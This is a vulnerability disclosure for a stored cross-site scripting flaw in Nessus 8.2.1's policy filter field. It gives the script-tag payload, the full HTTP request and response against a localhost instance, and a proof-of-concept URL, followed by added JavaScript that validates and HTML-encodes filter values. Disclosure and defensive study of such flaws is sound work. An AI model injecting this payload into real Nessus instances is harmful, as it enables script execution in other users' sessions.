Nessus 8.2.1 - Cross-Site Scripting

Author: Ozer Goker
Platform: multiple
Release date: 2019-02-04


##################################################################################################################################
# Exploit Title: Nessus 8.2.1 | Stored Cross-Site Scripting
# Date: 29.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Version: 8.2.1
##################################################################################################################################

Introduction
Nessus is #1 For Vulnerability Assessment

From the beginning, we've worked hand-in-hand with the security community. We continuously optimize Nessus based on community feedback to make it the most accurate and comprehensive vulnerability assessment solution in the market. 20 years later and we're still laser focused on community collaboration and product innovation to provide the most accurate and complete vulnerability data - so you don't miss critical issues which could put your organization at risk.


#################################################################################


XSS details: Stored

#################################################################################

XSS1 | Stored

URL
https://localhost:8834/policies

METHOD
POST

PARAMETER
value

PAYLOAD
\"><script>alert(1)</script>


Request

POST /policies HTTP/1.1
Host: localhost:8834
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:8834/
Content-Type: application/json
X-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4
X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45
Content-Length: 3467
DNT: 1
Connection: close

{"uuid":"939a2145-95e3-0c3f-f1cc-761db860e4eed37b6eee77f9e101","dynamicPluginFilters":{"joinOperator":"and","filters":[{"filter":"cve","quality":"eq","value":"\"><script>alert(1)</script>"}]},"credentials":{"add":{},"edit":{},"delete":[]},"settings":{"patch_audit_over_rexec":"no","patch_audit_over_rsh":"no","patch_audit_over_telnet":"no","additional_snmp_port3":"161","additional_snmp_port2":"161","additional_snmp_port1":"161","snmp_port":"161","http_login_auth_regex_nocase":"no","http_login_auth_regex_on_headers":"no","http_login_invert_auth_regex":"no","http_login_max_redir":"0","http_reauth_delay":"","http_login_method":"POST","enable_admin_shares":"no","start_remote_registry":"no","dont_use_ntlmv1":"yes","never_send_win_creds_in_the_clear":"yes","attempt_least_privilege":"no","ssh_client_banner":"OpenSSH_5.0","ssh_port":"22","ssh_known_hosts":"","region_hkg_pref_name":"yes","region_syd_pref_name":"yes","region_lon_pref_name":"yes","region_iad_pref_name":"yes","region_ord_pref_name":"yes","region_dfw_pref_name":"yes","microsoft_azure_subscriptions_ids":"","aws_use_https":"yes","aws_verify_ssl":"yes","aws_ui_region_type":"Rest of the World","aws_sa_east_1":"","aws_ap_south_1":"","aws_ap_southeast_2":"","aws_ap_southeast_1":"","aws_ap_northeast_3":"","aws_ap_northeast_2":"","aws_ap_northeast_1":"","aws_eu_north_1":"","aws_eu_central_1":"","aws_eu_west_3":"","aws_eu_west_2":"","aws_eu_west_1":"","aws_ca_central_1":"","aws_us_west_2":"","aws_us_west_1":"","aws_us_east_2":"","aws_us_east_1":"","enable_plugin_list":"no","audit_trail":"full","enable_plugin_debugging":"no","log_whole_attack":"no","max_simult_tcp_sessions_per_scan":"","max_simult_tcp_sessions_per_host":"","max_hosts_per_scan":"30","max_checks_per_host":"5","network_receive_timeout":"5","reduce_connections_on_congestion":"no","slice_network_addresses":"no","stop_scan_on_disconnect":"no","safe_checks":"yes","display_unreachable_hosts":"no","log_live_hosts":"no","reverse_lookup":"no","allow_post_scan_editing":"yes","silent_dependencies":"yes","report_superseded_patches":"yes","report_verbosity":"Normal","scan_malware":"no","enum_local_users_end_uid":"1200","enum_local_users_start_uid":"1000","enum_domain_users_end_uid":"1200","enum_domain_users_start_uid":"1000","request_windows_domain_info":"yes","scan_webapps":"no","test_default_oracle_accounts":"no","provided_creds_only":"yes","smtp_to":"postmaster@[AUTO_REPLACED_IP]","smtp_from":"nobody@example.com","smtp_domain":"example.com","av_grace_period":"0","thorough_tests":"no","report_paranoia":"Normal","detect_ssl":"yes","check_crl":"no","enumerate_all_ciphers":"yes","cert_expiry_warning_days":"60","ssl_prob_ports":"Known SSL ports","svc_detection_on_all_ports":"yes","udp_scanner":"no","syn_scanner":"yes","syn_firewall_detection":"Automatic (normal)","verify_open_ports":"no","only_portscan_if_enum_failed":"yes","snmp_scanner":"yes","wmi_netstat_scanner":"yes","ssh_netstat_scanner":"yes","portscan_range":"default","unscanned_closed":"no","wol_wait_time":"5","wol_mac_addresses":"","scan_ot_devices":"no","scan_netware_hosts":"no","scan_network_printers":"no","ping_the_remote_host":"yes","udp_ping":"no","icmp_ping":"yes","icmp_ping_retries":"2","icmp_unreach_means_host_down":"no","tcp_ping":"yes","tcp_ping_dest_ports":"built-in","arp_ping":"yes","fast_network_discovery":"no","test_local_nessus_host":"yes","acls":[{"object_type":"policy","permissions":0,"type":"default"}],"description":"","name":"test"}}

Response

HTTP/1.1 200 OK
Cache-Control:
X-Frame-Options: DENY
Content-Type: application/json
Date: : Tue, 29 Jan 2019 12:44:04 GMT
Connection: close
Server: NessusWWW
X-Content-Type-Options: nosniff
Content-Length: 38
Expires: 0
Pragma:

{"policy_id":161,"policy_name":"test"}


PoC
URL
https://localhost:8834/#/scans/policies/161/config/dynamic-plugins
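
A defensive counterpart to the request above, as an added example that is not part of the original advisory and is not Tenable's code: server-side validation of each dynamicPluginFilters.filters[].value, plus HTML encoding when the stored value is rendered. The field names come from the request body; the "cve" pattern, the fallback character check, the sample policy and the renderFilterInput helper are assumptions made for illustration.

```javascript
// Added example: validate and encode dynamic plugin filter values taken from
// a policy body shaped like the POST /policies request in this advisory.

// Assumed allow-list keyed by filter type. Only "cve" appears on the page;
// its pattern follows the public CVE ID format (CVE-YYYY-NNNN...).
const VALUE_PATTERNS = new Map([["cve", /^CVE-\d{4}-\d{4,}$/i]]);

// Assumed fallback for filter types without a pattern: reject characters
// that can terminate an HTML attribute or open a new element.
const HTML_META = /[<>"'&`]/;

// Returns one { index, filter, reason } entry per rejected filter.
function findBadFilters(policy) {
  const filters = policy?.dynamicPluginFilters?.filters;
  if (!Array.isArray(filters)) return [];
  const bad = [];
  filters.forEach((f, index) => {
    const type = typeof f?.filter === "string" ? f.filter : "(missing)";
    const value = f?.value;
    if (typeof value !== "string") {
      bad.push({ index, filter: type, reason: "value is not a string" });
    } else if (VALUE_PATTERNS.has(type)) {
      if (!VALUE_PATTERNS.get(type).test(value)) {
        bad.push({ index, filter: type, reason: "value does not match expected format" });
      }
    } else if (HTML_META.test(value)) {
      bad.push({ index, filter: type, reason: "value contains HTML metacharacters" });
    }
  });
  return bad;
}

// Output encoding for HTML text nodes and quoted attribute values. This is
// the control that matters for values already stored before validation existed.
const ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`]/g, (c) => ENTITIES[c]);
}

// Hypothetical renderer for one filter row; the real UI markup is not shown
// on the page, so this only illustrates encoding in an attribute context.
function renderFilterInput(f) {
  return `<input type="text" name="${escapeHtml(f.filter)}" value="${escapeHtml(f.value)}">`;
}

// Constructed sample: the relevant part of the request body, with the value
// from the advisory and one well-formed placeholder CVE ID for contrast.
const samplePolicy = {
  dynamicPluginFilters: {
    joinOperator: "and",
    filters: [
      { filter: "cve", quality: "eq", value: '"><script>alert(1)</script>' },
      { filter: "cve", quality: "eq", value: "CVE-2000-0000" },
    ],
  },
  settings: { name: "test" },
};

const rejected = findBadFilters(samplePolicy);
console.log(rejected);
console.log(renderFilterInput(samplePolicy.dynamicPluginFilters.filters[0]));
```

Validation on write and encoding on read are both needed: the first stops new policies carrying markup, the second neutralises values stored before the check existed.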